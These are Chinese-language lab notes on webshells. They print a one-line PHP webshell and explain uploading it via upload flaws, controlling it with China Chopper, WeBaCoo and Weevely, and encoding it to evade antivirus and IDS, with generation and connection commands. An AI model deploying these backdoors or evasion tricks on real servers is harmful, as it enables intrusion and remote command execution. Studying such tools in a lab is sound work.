webshell
本質:<?php echo shell_exec($_GET['cmd']);?>
windows平臺
中國菜刀官網:胖客戶端程式,國產中比較優秀的webshell,適用性較強 【但版本眾多而亂,可能存在木馬,據說的官網http://www.maicaidao.co/】
1、利用上傳漏洞,先上傳一句話木馬【支援三種伺服器端PHP、ASP、ASP.NET】
使用ssh連線metasploitable
建立包含木馬程式碼的檔案
2、連線相應的伺服器端
新增伺服器端URL 【密碼為一句話木馬中的引數】
雙擊進入檔案管理介面
也可以進入命令列模式【虛擬終端】 {許可權只為web程式的執行許可權}
可能被IDS、AV、WAF、掃描器軟體發現查殺 【可編碼免殺】
kali平臺下的webshell,本質與中國菜刀類似,有編碼功能,可避免被查殺
WeBaCoo(Web Backdoor Cookie)【只對PHP】
獲取的是類終端的shell
編碼通訊內容通過cookie頭傳輸,隱蔽性較強
引數:
cm:base64編碼的命令
cn:伺服器用於返回資料的cookie頭的名
cp:返回資訊定界符
1、生成伺服器端
wenacoo -g -o a.php
##利用scp上傳到metaspolitable的伺服器根目錄
移動webacoo.php到web根目錄
2、使用客戶端進行連線
webacoo -t -u http://1.1.1.1/a.php
##抓包分析如何通過cookie頭傳指令,手動觸發流量 【cm/cn/cp】
其他引數
webacoo -h
Weevely 【使用http頭進行指令(經過編碼)傳輸】
隱蔽的類終端PHP Webshell
有30多個管理模組
執行系統命令、瀏覽檔案系統
檢查伺服器常見配置錯誤
建立正向、反向TCP Shell連線
通過目標計算機代理HTTP流量
從目標計算機執行埠掃描,滲透內網
支援連線密碼
*****************************************************************
##kali中缺少庫
https://pypi.python.org/pypi/PySocks/ 【下載庫檔案壓縮包】
./setup.py install
****************************************************************************************
1、生成服務端 【生成經過編碼的木馬】
weevely generate <password> <path>
##上傳木馬
2、連線客戶端
weevely <URL> <password> [cmd]
3、模組
help